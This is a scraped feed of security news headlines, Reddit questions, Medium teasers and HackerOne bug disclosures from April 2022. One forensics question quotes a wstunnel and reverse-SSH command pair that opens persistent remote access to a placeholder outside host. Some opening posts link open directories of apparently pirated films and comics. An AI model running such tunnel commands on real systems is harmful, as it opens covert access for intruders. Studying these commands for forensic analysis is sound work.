    There's several movies in the movie folder, arranged quite weirdly. https://dl3.3rver.org/hex1/ I do not know what is in the other folders. submitted by /u/NursingGrimTown
    Went looking for Moon Knight comics.
    I know at least 1 is a repost. https://archives.eyrie.org/anime/ https://www.greenlittleapple.com/ln/ This one was a bit iffy - it is up and down for me. https://booksdl.org/comics0/_0DAY/0-Day%20Week%20of%202019.09.11/ submitted by /u/ringofyre
    English & Intl movies, animation, PC games, other stuff
    http://103.152.18.18/Data Kind of slow but functional. submitted by /u/rippleredial

    Cracking Kubernetes RBAC Authorization Model
    This post first appeared as Limiting access to Kubernetes resources with RBAC, which was kindly edited, re-illustrated and exemplified by learnk8s.io, and is very friendly to beginners. The version posted here, in contrast, has a focus skewed toward the design and implementation, as well as in-depth discussions. TL;DR: This post digs into the Kubernetes RBAC authorization (AuthZ) model. Specifically, given the technical requirement of granting proper permissions to an application to access kube-apiserver, we’ll introduce concepts like User, ServiceAccount, Subject, Resource, Verb, APIGroup, Rule, Role, RoleBinding etc. step by step, and eventually build an RBAC authorization model on our own. Hope that after reading this post, readers will have a deeper understanding of the access control (AuthZ) of kub…


    Threat Actor Profile - ALPHV
    submitted by /u/RandyMarsh_Lorde

    business.amazon.com Has a HUGE VULNERABILITY that allows attackers to send emails
    Hi everyone. I made a post about a weird spoof email I received from business.amazon.com that may hint at a possible vulnerability pertaining to the DNS records for business.amazon.com. Post: I think someone figured out what is going on with this comment. I got the attention of AmazonHelp over at Twitter (Link To AmazonHelp's comment). Update: Here are some screenshots of how the conversation is going over at Twitter (https://imgur.com/a/ggZSVyk) submitted by /u/possiblyahermit
    Understanding Port Forwarding Commands
    Hi all, I'm doing some forensics at the moment (...school environment). I just wanted to get some feedback on my interpretation of these commands. I don't have a lot of experience with bouncing traffic around.
    nohup ./wstunnel -L 8888:localhost:22 ws://w.x.y.z:80 &
    sleep 2
    nohup ssh -o "StrictHostKeyChecking no" -R 2222:localhost:22 -p 8888 -N kali@localhost &
    First line: No hang-up (persist), start a websocket tunnel that binds to port 8888 on localhost, and forwards to port 22 (moving the communication over SSH). The tunnel destination is w.x.y.z:80, and the command is backgrounded. Last line: No hang-up (persist), and specify that connections to port 2222 on localhost should be forwarded to port 22. Do not execute a remote command (-N) and connect via SSH to kali@localhost (which is a remote attacker, I think. Not sure why it is called "localhost"), and background the command. It's definitely a bit confusing for me to parse. Am I off the mark? submitted by /u/InfamousClyde
    How do you organise your knowledge on long engagements?
    For CTFs, I use CherryTree for notes, but it doesn't scale to a group. At the company, we use text files (markup) in folders, and regular files in folders, and do a full-text index on the whole mess. (Of course some stuff, like BloodHound data, can't be easily indexed.) And we can't even agree on folder names. Sometimes you know the host name of a box, sometimes only the IP. Boxes have more than one IP. The same Windows box may get a different IP the next day via DHCP. The company may have two 192.168.1.X subnets that just don't route to each other. (We had a look at Dradis & pentest.ws and found them too restrictive/opinionated, but maybe we have to give them another try.) - How do you organise your knowledge? - Any workflows or tools that work well? Thanks! submitted by /u/MOVSQ
    Is Network+ and web penetration testing enough to land an entry job as a penetration tester?
    So I finally networked with one guy who works as a manager for a cyber security team. He is one of the best in my country, a geeky guy who is very familiar with pretty much everything. Under him he has many teams for mobile, IoT, web, and others. He told me that I should have solid knowledge of networks and web, and practise hacking challenges mainly on web penetration testing, and machines on HackTheBox. I asked him if I should focus on reverse engineering, exploit development. He told me many things on that: first is that it requires much understanding of OS, architecture, and compiler theory; second is that there aren't many jobs in them except in hardware hacking and IoT. But if I want to practise reverse engineering challenges besides web, that is fine. The problem is that I feel …

    How to create a Satellite Imagery Time-Lapse: Case Study of Myanmar & the South China Sea.
    A time-lapse is essentially multiple amounts of satellite images over a specific string of time whether that be over weeks or months or… Continue reading on Medium »
    War in Ukraine / April 15
    The Molfar team sends a daily newsletter about the war in Ukraine. Continue reading on Medium »
    OSINT in GitHub…
    Let’s take a look at the main data sources that are used when conducting OSINT research in the GitHub service: Continue reading on Medium »
    OSINT in Discord
    Today I’m going to break down the main sources of data I use when doing OSINT user profile research on Discord: Continue reading on Medium »

    [https://shipit-sox-staging.shopifycloud.com] Presence of multiple vulnerabilities present in Ruby On Rails
    Shopify disclosed a bug submitted by beastglatisant: https://hackerone.com/reports/1400309 - Bounty: $500
    Account takeover leading to PII chained with stored XSS
    U.S. General Services Administration disclosed a bug submitted by hollaatm3: https://hackerone.com/reports/1483201

    Any ideas what college students would love to see from a guest speaker?
    I work in DFIR, and I’ve been invited to talk to college students about my experience, the field, etc. Any good ideas of what I should include and make sure to talk about? submitted by /u/tfulab23

    SecWiki News 2022-04-16 Review
    Compromising a university in half a day by ourren; A graph-query-based attack provenance method by ourren; Banli: high-risk asset identification and high-risk vulnerability scanning by ourren; The dilemma and the way out for SCA by ourren. For more recent articles, visit SecWiki.

    Pandora Swap is launching a Bug Bounty Program
    Hi, Pandora Legion! We are very impressed and mesmerized by your love, support, and interactions, and we have a new announcement to make Continue reading on Medium »
    How I Hacked My School’s Students Portal to get access to any student’s details?
    Introduction Continue reading on Medium »
    HOW RECON HELPED ME TO GET A STORED XSS!
    RECONNAISSANCE IS THE KEY IN BUG BOUNTIES Continue reading on Medium »
    Linux User Controls
    What is Linux Continue reading on Medium »
    Port scanning and service discovery in 2022 — we have failed as a humanity
    There have been a lot of popular port scanning projects lately. In particular, these are projects that seek to combine fast port discovery… Continue reading on Medium »
    How we spoofed ENS domains for $15k
    TL;DR: We found a flaw that allowed us to spoof Ethereum domain names and received a $15k bounty. Continue reading on Medium »
    Change Any User Profile Details on Disney
    The Walt Disney Company started its program on Hackerone in March 2022. Continue reading on Medium »
    Creating Your Own Telegram Bot For Recon Bug Bounty
    Hello friends, this is my fourth blog regarding bug hunting Continue reading on Medium »

    Kiterunner
    🔍 Introduction Kiterunner is a content-discovery tool made by Assetnote. Rather than a typical fuzzing/brute-force tool pointed at a given location, it guesses API specifications using known Swagger spec data and a dataset compressed into its own schema, and then finds API endpoints by sending known HTTP methods, headers, paths, parameters and so on. Note that because Assetnote maintains wordlists that change periodically, the wordlist Kiterunner uses is not just a simple list but one based on data actually used widely on the web. Naturally, this can produce faster and better results.

    Industroyer2: The Worst Sequel
    submitted by /u/entropydaemon5
    GitHub: Security alert - Attack campaign involving stolen OAuth user tokens issued to two third-party integrators (Heroku and Travis CI)
    submitted by /u/DAMNIT_RENZO

    White-box analysis of the phpMyAdmin file inclusion vulnerability (from theory to practice)
    Through a white-box analysis of the mainstream MySQL connection frameworks, combined with hands-on notes, readers can more quickly put what they learn to use.
    Captured jumbo frames on a virtual target range!
    While capturing packets on my own virtualized target range, I noticed that the Length shown in the Wireshark panel was far larger than the MTU, even though the MTU of the capture interface was clearly 1500. Why is that?
    HackTheBox Overflow machine
    Preface: this is a hard machine; its content mainly tests web vulnerability exploitation, reverse engineering, persistence, privilege escalation and other areas.

    JekyllBot:5 A Security Vulnerability Affecting Hospital Robots [pdf]
    Article URL: https://assets.website-files.com/5d2ad783e06f4c19469d363a/625551dd440d0b187fa96d38_JekyllBot-5-Vulnerability-Disclosure-Report.pdf Comments URL: https://news.ycombinator.com/item?id=31048534

    Resource Based Constrained Delegation
    A quick read on an attack path that can be leveraged to escalate network privileges and for lateral movement. Continue reading on Medium »


    PYSA Ransomware Group Technical Analysis
    submitted by /u/wtfse
    [Techmonitor.ai] Failed cyberattack on Ukraine's electricity grid could indicate Russia's growing willingness to attack critical infrastructure
    submitted by /u/NoStarchPress
    New tool to exploit TURN servers - create a socks proxy into the internal network
    submitted by /u/FireFart
    Multiple Vulnerabilities in Cisco Expressway
    submitted by /u/FireFart
    Turncoat - Extract private messages from malware/phishing Telegram Bots
    submitted by /u/DoOrDieCalm
    iViewed your API keys
    submitted by /u/Gallus

    Stored XSS, SQL, IDOR and Hall Of Fames
    Hello, today I am going to be writing about how I found stored XSS, reflected XSS, SQL and IDOR all within a software that was in scope… Continue reading on Medium »
    Mining Liquidity for Bug Bounty Contribution
    Hats Finance is excited to introduce Protocol Protection Mining starting in Q2 2022, allowing anyone in the ecosystem to become a… Continue reading on Medium »

    A Detailed Guide on Medusa
    Hi Pentesters! Let’s learn about a different tool Medusa, which is intended to be a speedy, parallel and modular, login brute forcer. The goal of The post A Detailed Guide on Medusa appeared first on Hacking Articles.

    Autopsy web cache understanding
    Hello everyone, I am a junior analyst and today I was doing forensics on a disk from one PC with Autopsy. I had some alerts of a user accessing some malicious website and running some sort of DoS attack. I checked browser history and could not find any log of opening that website (he could have removed it or opened it in a private window), but when I was doing forensics in Autopsy, in Web Cache I could find multiple web caches like this, for example:
    URL: https://okay-website.com https://malicious-website.com
    URL: https://okay-website.com https://malicious-website.com https://malicious-website.com/target/blablabla
    For some of these, the domain was also pointing to https://malicious-website.com. Now my question is, as I was not able to find that website even in the Autopsy web history, nor did I find some downloads or anything else, was it possible that the user did not open a malicious website, but that okay-website.com did in the background? I am not sure if I understood 100% what the meaning of those web caches is. Now a few things to know: 1) Alerts that I got were at the exact same time as the user opened okay-website for the first time. 2) In Web Cache I could see similar results for other domains that are linked to advertisement. 3) With uBlock Origin I can see those ad URLs that he blocked, the very same as in Autopsy, but I can not see the malicious site. Cheers and thanks submitted by /u/facyber
    How do Mobile Forensic tools work?
    Hi community… Commercially available tools like Cellebrite UFED in Mobile Forensics obtain deleted data by rooting the device… But how is it possible without installing Magisk and unlocking the bootloader? Even after the process the device doesn’t show any trace of root. Any idea on the details of the tools? Thanks submitted by /u/Aromatic_Ideal_2933

    Malware Lab / Analysis - Internet Connectivity - Analyzing Secondary Payloads?
    I have a question around malware labs and handling external communications. I've been building out a malware analysis lab in VMware with a REMnux VM and a Win10 machine. Obviously the machines should be isolated on their own internal network, isolated from my primary workstation. So my question with this setup is, how do we analyze secondary payloads that may require a download from the internet if the VMs don't have a way of getting out? We can capture that the initial payload is attempting to reach out to a domain or IP to pull something down, but it won't be successful. Just curious if there's a safe way to work around this, or if we don't really concern ourselves with actually grabbing the secondary payload from the web that it's trying to get? submitted by /u/IHadADreamIWasAMeme
    Which Linux distribution would you recommend for use only as a quarantine machine?
    I want to create a virtual machine that I will use to download files that I think are malicious. A distribution without unnecessary applications would be great, to be honest, but I could need some basic tools while opening the files. And I need a GUI too. Which distribution would you recommend to me? submitted by /u/Cpt_Winters
    Building a vulnerability management dashboard
    So I am not a developer, but I was asked to develop a dashboard for vulnerability management. I think of Nessus instantly. Is there an open source dashboard I can work with? I am very new at this. I will remove this post if it's the wrong subreddit to ask in. submitted by /u/light_striker12
    Career Shift
    Anyone here who is a former netsec engineer and is now in the field of DevOps? How was the transition? Did you start again from scratch? submitted by /u/heisenboard
    Anyone ever work for the NSA?
    I've been considering it for the future, because I'm going to school for cybersecurity right now and I have no clue if I want to work for the government or do something else. What would you recommend? And what is working there like? Seriously, thank you so so much if you answer this question, because I have been looking everywhere and I haven't been able to find anyone who has worked/works there. :D submitted by /u/AQuestionableAgender

    War in Ukraine / April 14
    The Molfar team sends a daily newsletter about the war in Ukraine. Continue reading on Medium »
    Exploring the Dark Web…
    Today I’m going to talk to you about tools for exploring the Dark Web. The list will be updated, as the topic is very diverse. Continue reading on Medium »
    IP address OSINT
    Today I want to discuss with you a number of sources that I use when conducting IP address OSINT research. Continue reading on Medium »

    SecWiki News 2022-04-15 Review
    APTMalInsight: identifying and understanding APT malware based on system call information and an ontology knowledge framework by ourren. For more recent articles, visit SecWiki.

    Corrupting the Source Docker Image
    submitted by /u/tbhaxor
    Demystifying iOS Code Signature
    submitted by /u/dmchell

    SSE(Server Sent Event)
    🔍 Introduction SSE (Server-Sent Events) is a server push technology; much like WebSockets, the server and JavaScript communicate so that data can be received. However, while WebSockets allow bidirectional communication, SSE can only handle the server→client direction. When you simply need to receive pushes from the server, SSE can be the most convenient technology to use. That said, in terms of performance and technical aspects it has more drawbacks than advantages, so most services use WebSocket or Ajax instead. Event Stream Format: Basic and content-type. SSE uses the text/event-stream type and a plain text response.

    Gaining Visibility Within Container Clusters
    Service mesh platforms can be used to provide insight into the container processes and their network operations within K8s clusters. The post Gaining Visibility Within Container Clusters appeared first on Unit42.

    Design ideas for the Digital China Internet of Vehicles challenge
    This article was contributed by mldwyy of Gamma Lab; after the competition, the design ideas and solution for this challenge are published for everyone to study and discuss.
    FreeBuf Morning Report | Microsoft disrupted the ZLoader botnet; more than 3.5 million Russian internet accounts breached
    Russian hackers attempted to attack Ukraine's power grid with the Industroyer2 malware.
    Cisco fixes high-severity authentication bypass vulnerability
    A high-severity vulnerability in Cisco Wireless LAN Controller software allows attackers to bypass authentication controls.
    Introduction to ATT&CK v10 tactics: Resource Development
    In this installment we introduce the Resource Development tactic among the 14 ATT&CK tactics.
    An analysis from the perspective of telecom fraud: how do fraud funds flow?
    In recent years, as China's economy and society have rapidly transformed toward digitalization, the structure of crime has fundamentally changed.
    New Enemybot DDoS botnet borrows attack code from Mirai and Gafgyt
    Recent research indicates that a threat group engaged in cryptomining and distributed denial-of-service (DDoS) attacks may be linked to a new botnet named Enemybot.
    CISA warns agencies to patch actively exploited Windows LPE bug
    The Cybersecurity and Infrastructure Security Agency (CISA) has added 10 new security vulnerabilities to its list of actively exploited vulnerabilities.
    FreeBuf enterprise-side group discussion | Let's talk about enterprise asset security management
    In today's network environment, where assets are highly digitized and threats keep growing, ever-larger asset inventories appear ever more fragile, and keeping enterprise assets secure is a considerable challenge.
    Reproducing the DVRF target range
    In recent years, as vulnerabilities in all kinds of IoT devices have drawn more public attention, the harm caused by their exploitation has also grown more serious.
    Emergency Chrome update fixes another zero-day vulnerability
    Google has released Chrome 100.0.4896.127 to address a high-severity zero-day vulnerability exploited in the wild.
    Apache Dubbo CVE-2021-36162 discovery process
    The discovery and analysis process for Apache Dubbo CVE-2021-36162.
    Who would have thought: is the age of US nuclear facilities the key to their safety?
    Until three years ago, the US nuclear system was still using an IBM System 1 computer built in 1976; one line of thinking holds that because these systems are so old, they are actually harder to compromise.
    US data breaches continued to rise in Q1 2022, with "unknown" the largest attack vector
    The vast majority (92%) of data breaches recorded by the ITRC can be traced to cyberattacks, with phishing and ransomware the top two causes overall.
    Reproducing common framework vulnerabilities: Apache Struts2
    Struts 2 vulnerability reproduction and analysis
    Spring Cloud Gateway remote code execution vulnerability analysis (CVE-2022-22947)
    Spring Cloud Gateway remote code execution vulnerability analysis (sharing the CVE-2022-22947 analysis)


    I Found My First Cross-site Scripting (XSS)
    Hello Hunters! In this short article I will explain how I found my first (XSS) Continue reading on Medium »
    Bypass Rate Limit — A blank space leads to this random encounter!
    Hello All, Hope you are having a great time! Continue reading on InfoSec Write-ups »
    MY First Bug In Hackerone
    Hello My Dear Buggies!!! Continue reading on Medium »
    Subdomain Enumeration
    Open Source Intelligence gathering tool Continue reading on Medium »

    Next step for exploit dev?
    Good day everyone, So I’ve done a lot of the sources for beginners/intermediate for reversing and exploit dev. I’ve gone through sources users like u/PM_ME_YOUR_SHELLCODE have recommended, and also did pwn.college which was really amazing. But now I wanna get into real world stuff and learn as I go. I wanna focus maybe on browser stuff but it’s really overwhelming and hard to find helpful resources. I’m asking to see if anyone here with experience has any pointers on what to start on and where to look (doesn’t necessarily have to be browsers; if anyone has interesting fields to get into I’d be happy to try new things). submitted by /u/Any-Presentation-679
    Will learning the 6502 processor help me later in binary exploitation and reverse engineering?
    Hello, So basically I am a management of information technology graduate. I took basic OS and hardware courses in college. Currently I am doing an IT internship, and I am practising my hacking skills on HackTheBox (web and networks only). I am very passionate about reverse engineering, assembly, and binary exploitation. I plan that after I am comfortable enough with web application hacking I can then start doing some exploit development. I am good with solving basic crackmes and simple buffer overflows but that is it. I have a gap in the hardware area, then I discovered someone called Ben Eater on YouTube, and I ordered his kit to build a 6502 computer. I am doing this as a hobby first and foremost to know how computers work and interact with the CPU and memory. But also so that later in my career I can comfortably understand stack, assembly, and kernel exploits on a deeper level. So is that good or did I just waste my money on the kit? submitted by /u/Ramseesthe4th

    Diving Deeper into WatchGuard Pre-Auth RCE - CVE-2022-26318
    submitted by /u/Mempodipper
    Blinding Snort: Breaking the Modbus OT Preprocessor
    submitted by /u/derp6996
    CVE-2022-28345 - Signal client for iOS version 5.33.2 and below are vulnerable to RTLO Injection URI Spoofing using malicious URLs such as gepj.net/selif#/moc.elpmaxe which would appear as example.com/#files/ten.jpeg
    submitted by /u/docker-osx
    VSTO enabled Office documents allow for remote .NET assembly remote code execution
    submitted by /u/DanielS-AL
    Akamai Blog | Critical Remote Code Execution Vulnerabilities in Windows RPC Runtime
    submitted by /u/gquere
    Extracting the hashed uninstall password for Cortex XDR being low privileged user
    submitted by /u/gid0rah
    Microsoft Exposes Evasive Chinese Tarrask Malware Attacking Windows Computers. The Chinese-backed Hafnium hacking group has been linked to a piece of new malware that's used to maintain persistence on compromised Windows environments.
    submitted by /u/Late_Ice_9288

    Read and write beyond bounds in mod_sed
    Internet Bug Bounty disclosed a bug submitted by tdp3kel9g: https://hackerone.com/reports/1511619 - Bounty: $4000
    [Bypass] Ability to invite a new member in sandbox Organization
    HackerOne disclosed a bug submitted by 0619: https://hackerone.com/reports/1486417 - Bounty: $2500

    THE WORLD’S MOST COMPREHENSIVE OSINT TOOL CATALOG MORE THAN 600 TOOLS 2022.
    Waiting for the most expected OSINT service, analyzing more than 600 resources at a time, to be launched (more info here…).  We’re sharing… Continue reading on Medium »
    War in Ukraine / April 13
    The Molfar team sends a daily newsletter about the war in Ukraine. Continue reading on Medium »
    Tools (OSINT) every security engineer should be aware of
    We will try to solve three questions in this blog. Let’s explore!! Continue reading on Medium »
    Searchlight — IMINT
    This room has OSINT challenges. In this room, we will be exploring the discipline of IMINT/GEOINT, which is short for Image intelligence… Continue reading on Medium »
    Subdomain Enumeration
    Open Source Intelligence gathering tool Continue reading on Medium »
    Google Dorks or Hack…
    Google Dorks or Hack is a technique for creating queries on the Google search engine to discover hidden information and vulnerabilities… Continue reading on Medium »
    Searching and Aggregating TOR/ONION Links
    While crawling and processing tons of pastes from public paste sites like Pastebin I recognized that people also use these sites to… Continue reading on Medium »

    Process Doppelganging (Mitre:T1055.013)
    Introduction Eugene Kogan and Tal Liberman presented a technique for defense evasion called “Process Doppelganging” in Blackhat EU 2017 which can be found here and The post Process Doppelganging (Mitre:T1055.013) appeared first on Hacking Articles.

    Listen to the rumble of dream cars (with videos)
    http://162.212.178.138:8080/cars test
    http://162.212.178.138:8080/don-games/ Android games
    http://162.212.178.138:8080/d3/Top10 of something
    http://162.212.178.138:8080/d4/Videos about China
    http://162.212.178.138:8080/china/ music videos from China
    http://162.212.178.138:8080/gsongs/ mp4 pop-rock music
    submitted by /u/Appropriate-You-6065
    Massive SWF archive
    https://locker.phinugamma.org/swf/ It has many SWF files from numerous sites like Armor Games, Addicting Games, Albino Black Sheep, The Best 404 Page Ever, Miniclip, and more. submitted by /u/JeffedCenaa2

    Dependabot alerts now surface if your code is calling a vulnerability
    Article URL: https://github.blog/2022-04-14-dependabot-alerts-now-surface-if-code-is-calling-vulnerability/ Comments URL: https://news.ycombinator.com/item?id=31029253
    CVE-2021-1782, an iOS in-the-wild vulnerability in vouchers
    Article URL: https://googleprojectzero.blogspot.com/2022/04/cve-2021-1782-ios-in-wild-vulnerability.html Comments URL: https://news.ycombinator.com/item?id=31029245
    Preventing Cryptographic Failures: The No. 2 Vulnerability in the OWASP Top
    Article URL: https://www.synack.com/blog/preventing-cryptographic-failures-the-no-2-vulnerability-in-the-owasp-top-10/ Comments URL: https://news.ycombinator.com/item?id=31027891

    SecWiki News 2022-04-14 Review
    Is ATT&CK becoming a security "metaverse"? by ourren; TP-Link WDR-7660 security research: firmware analysis by ourren; Practice and exploration of knowledge graph visualization technology by ourren. For more recent articles, visit SecWiki.

    FreeBuf Weekly Report | Mirai malware actively exploiting the Spring vulnerability; consumers increasingly numb to data breaches
    Surveys show that consumer trust in the organizations they do business with is at an all-time low, leading many to "give up" on security.
    Over data and privacy security issues, this giant has been fined more than $1 billion in total in the past year
    For internet companies, data is both their most precious asset and their biggest headache; walking the tightrope between profit and protecting user privacy, stumbles are inevitable.
    VulnHub machine: DerpNStink-1
    7 - VulnHub machine - DerpNStink1
    Building a SIEM platform for a small organization with Elasticsearch SIEM
    Elasticsearch SIEM gives small and medium-sized enterprises a way to build their own SIEM. Its advantages include being open source, having a complete set of components, detailed documentation, easy extensibility and so on.
    Shellcode AV evasion: evasion with Go
    The Go language is optimized specifically for programming applications on multiprocessor systems; programs compiled with Go can rival the speed of C or C++ code while being safer and supporting parallel processes.
    FreeBuf Morning Report | African banks become primary targets of malware attacks; wind turbine giant Nordex hit by cyberattack
    German wind turbine manufacturer Nordex Group suffered a cyberattack on March 31, 2022; the company released an update this week.
    HackTheBox WeatherApp writeup: a classic SSRF + SQL injection case, code audit
    This challenge is of medium difficulty and would be very hard to solve without the source code; SSRF comes to mind, but it feels a bit like the blind men and the elephant.
    PortSwigger: explanation of WebSocket-based vulnerabilities
    PortSwigger: study notes on WebSocket-based vulnerabilities.
    VMware CVE-2022-22954 vulnerability hits hard: patch immediately!
    Researchers have recently found a proof-of-concept exploit for the VMware CVE-2022-22954 remote code execution (RCE) vulnerability.
    Elementor WordPress plugin vulnerability could affect 500,000 sites
    The WordPress Elementor page builder plugin has a remote code execution vulnerability that could affect up to 500,000 websites.
    CVE-2021-31805 RCE vulnerability in Apache Struts finally fixed
    The Apache Software Foundation urges organizations to address the vulnerability tracked as CVE-2021-31805.
    MIIT issues the "Industrial Internet Special Working Group 2022 Work Plan"
    The Plan calls for building an upgraded "5G + Industrial Internet": accelerating the construction of 5G fully connected factories, issuing guidance documents for their construction, and creating 10 benchmark 5G fully connected factories.
    Some thoughts on questions about the Spring Framework RCE (CVE-2022-22965)
    Some time after the Spring RCE vulnerability was exposed in the wild, Spring officially published the vulnerability details on March 31; this article shares and answers some questions about the vulnerability.

    Serialization&Deserialization Attacks
    Bypass Rate Limit — A blank space leads to this random encounter!
    BITB (browser in the browser)Attack
    Develop Bluetooth Apps | Fundamentals, Tools & Coding

    BotNet probing private IP ranges?
    Good morning, Have a question for you all that I can't think through the answer to. We exist in Azure GCC-H. Looking at my Sentinel threat dashboard, I see a list of "high confidence" botnet activity originating out of Russia, attempting to hit all of my VMs in Azure. Now, they are all private IP addresses, so what I am wondering is how is an external system not in my domain attempting to connect to a 10.X IP address inside my domain without being on a VPN? Is it just pointing its scan at my public gateway and going through the whole list of private IPs, hoping to be able to break through to one? submitted by /u/ToLayer7AndBeyond
    VPN Host Checker - Asset Validation
    Morning. We’re currently setting up a new VPN environment and we’re thinking about asset validation. There are two options, checking for a machine PKI certificate or simply checking domain membership. Is it enough to simply check domain membership, and can’t that be faked in some way? submitted by /u/annonuk2020
    Question about network hardware devices (routers, modems, and NICs)
    I have a TP-Link router, an old Ethernet NIC card, and a modem that I want to understand more. Hello; I want to learn some hardware. I am fully aware of the OSI model and studied Network+ before and understand how NICs and routers are used. But can someone explain the components to me on a very low level? Attached is the hardware I have; if anyone can point me to a datasheet or something that explains each part (this is a capacitor, this is for volt resistance). Some parts I can identify but others not. If anyone can help that would be great cuz I want to understand them more. Here is the NIC: https://www.amazon.com/Realtek-RTL8139D-100Mbps-Ethernet-Adapter/dp/B000YJIJI2 The modem: https://archiwum.allegro.pl/oferta/modem-lucent-hv90p-t-warszawa-i7535730930.html I kept searching for anything that tells me each component on them but I can’t find any. Thanks submitted by /u/Ramseesthe4th

    Persisting XSS With IFrame Traps
    XSS Iframe Traps: Longer Running XSS Payloads. An issue with cross-site scripting (XSS) attacks is that our injected JavaScript might not run for an extended period of time. It may be a reflected XSS vulnerability where we’ve tricked our user into clicking a link, but when they land on the page where we were able... The post Persisting XSS With IFrame Traps appeared first on TrustedSec.

    Make phishing great again. VSTO office files are the new macro nightmare?
    Intro to the Office VSTO format, a capability that provides rich capabilities for attackers to phish users and gain code execution Continue reading on Medium »

    The Art of Memory Forensics
    I read somewhere that memory structures change with every iteration of Windows. With that said, does anyone know if The Art of Memory Forensics (2014) is still relevant? Thank you! submitted by /u/DeadBirdRugby
    Is it possible to split pcap files into pieces?
    I have a big pcap file. I want to split it into chunks with data of the same size each (e.g. 1000 packets each). submitted by /u/One-Ad2289
    iOS Backup Analysis with Open Source
    Hi community… currently working on a project on analysing iPhone backup data with open source tools. I’m working on iOS version 15.3. I have taken an unencrypted backup with passcode disabled. How can we analyse these types of files written in a format like ‘b5, 56, 20’ etc.? Any suggestions would be helpful… Thanks submitted by /u/Aromatic_Ideal_2933

    Critical RCE Vulnerability in Elementor WordPress Plugin
    Security Risk: High. Exploitation Level: Easy. CVSS Score: 9.9. Vulnerability: Remote code execution (RCE). Patched Version: 3.6.3. On April 12th, an important security update was released for the Elementor plugin, patching a critical remote code execution vulnerability which allows all authenticated users, including subscribers, to upload and execute arbitrary PHP code on a vulnerable website. This vulnerability, identified as CVE-2022-1329, is extremely severe. Continue reading Critical RCE Vulnerability in Elementor WordPress Plugin at Sucuri Blog.
    Sucuri WordPress Plugin += Sucuri WAF
    Sucuri has always been a dedicated supporter of the WordPress community. Our free plugin was one of our first contributions to WordPress security (before bootstrapping our efforts into our WAF/CDN, Backups, and Malware Remediation services). However, over my many years involved in web application security, I’ve found that one of the most evasive aspects of security for most business owners, enterprises, and agencies is visibility into security events impacting their websites. This includes monitoring who is logging in, knowing what changes are occurring in your site’s environment, and understanding what steps you can take to mitigate risk or react to a compromise. Continue reading Sucuri WordPress Plugin += Sucuri WAF at Sucuri Blog.

    Digging Into Open Reporting
    As many readers of this blog are aware, I often find great value in open reporting, but I also see the value in taking that open reporting a step (or three) further beyond where it exists now. In more than a few instances, something extra can be pulled from open reporting, something not presented or discussed in the article that can be of significant value to readers in domains such as DFIR, detection engineering, MSS/SOC monitoring, etc. As a result, I've spent a great deal of time during my career looking for alternate means for detecting activity (user, threat actor, malware) presented in open reporting, largely due to gaps in that reporting. For example, there's a great deal of open reporting that is based solely on RE and analysis of malware that is part of the final stage of the…

    Reflected XSS on TikTok Website
    TikTok disclosed a bug submitted by homosec: https://hackerone.com/reports/1378413 - Bounty: $3000
    CSRF protection bypass in GitHub Enterprise management console
    GitHub disclosed a bug submitted by bitquark: https://hackerone.com/reports/1497169 - Bounty: $10000
    Stored XSS on the "www.intensedebate.com/extras-widgets" url at "Recent comments by" module with malicious blog url
    Automattic disclosed a bug submitted by superpan: https://hackerone.com/reports/1083734 - Bounty: $150
    Improper Implementation of SDK Allows Universal XSS in Webview Leading to Account Takeover
    EXNESS disclosed a bug submitted by holyfield: https://hackerone.com/reports/1455987 - Bounty: $300
    Ability to connect an external login service for unverified emails/accounts at accounts.shopify.com
    Shopify disclosed a bug submitted by saltymermaid: https://hackerone.com/reports/1018489 - Bounty: $1600
    CRLF Injection - Http Response Splitting
    EXNESS disclosed a bug submitted by socialcodia: https://hackerone.com/reports/1514359 - Bounty: $200
    Acess control vulnerability (read/write)
    EXNESS disclosed a bug submitted by a_ashwarya: https://hackerone.com/reports/1174387 - Bounty: $1000
    Access control vulnerability (read/write)
    EXNESS disclosed a bug submitted by a_ashwarya: https://hackerone.com/reports/1174734 - Bounty: $2500
    Access control vulnerability (read-only)
    EXNESS disclosed a bug submitted by a_ashwarya: https://hackerone.com/reports/1159367 - Bounty: $2250
    Taking position in a discontinued forex pair without executing any trades
    EXNESS disclosed a bug submitted by a_ashwarya: https://hackerone.com/reports/1509211 - Bounty: $2337
    Open S3 Bucket Accessible by any User
    Omise disclosed a bug submitted by ravansurya: https://hackerone.com/reports/1474017 - Bounty: $100

    Other than these, how to best mitigate a DDoS attack?
    Other than CloudFlare, blocking IP blocks on the network firewall and blocking on server's IPtables, what else can be effectively done to mitigate a DDoS attack? submitted by /u/arpegius55555 [link] [comments]
    is my Android screen being monitored?
    Okay here's the thing, I've recently observed that whenever I open my Instagram's vanish mode I see that line "you took screenshot" and it's multiple and comes off like a blast. Whereas I haven't taken any screenshots. My gallery is clear. And I've observed that my device is running slow after the recent software update. It's a Realme XT, running Android security patch of date March 5 2022. I usually limit background apps in dev options. I'm not a netsec student or a professional, but someone who is concerned about his privacy. I don't think anyone has any grudges on me. Is it a bug or is it spyware that I may have accidentally downloaded? Do help me. I may not respond to the comments for the next 6 hrs since I'm crashing to sleep after a whole day of studying. I know this might be a low effort question, but I do apologise. I'm trying my best. I've seen my permissions including admin permissions on my phone and all seem normal. submitted by /u/0_lucifer_0 [link] [comments]
    how to know if I'd prefer offensive or defensive security?
    Hello. I am a support engineer, working on my Sec+ and hoping to get a cyber security job within a year or two. I can't make up my mind about whether I'd rather be blue team or red team. CTFs are very fun. Getting a flag or a reverse shell is a rush. But I'm not sure about actual pentesting. Trying to break into a black box system for 100 hours does not sound fun. Blue team sounds fun too. The hunt, trying to figure out how an incident happened and who did it. I also imagine it would be easier to work for startups or big companies later in my career (FAANG). I also like programming beyond scripting. Thoughts? submitted by /u/Throwaway_deafgrape [link] [comments]
    How to find interesting computers on a big network?
    Hello community! When auditing a large Windows network (like 300 computers), how do you figure out which computers may be of interest? It may be easy if computers are named meaningfully (ADM-something), but if that is not the case, how can I figure out (for example) the computer used by a given user (admin, CEO, etc.)? Is it possible to get that information with a PowerShell AD query? Regards submitted by /u/fAyf5eQR [link] [comments]
    Trusted Remote Desktop Services (RDP) SSL Certificate
    Hi everyone. Our Cyber Security department told us to start deploying and using certificates to secure communication between RDP and WMI client and server. My question is related to the validity and renewal period. What should be configured and why? Thanks!! submitted by /u/plainas [link] [comments]
    Securing a password manager with 2FA makes no sense?
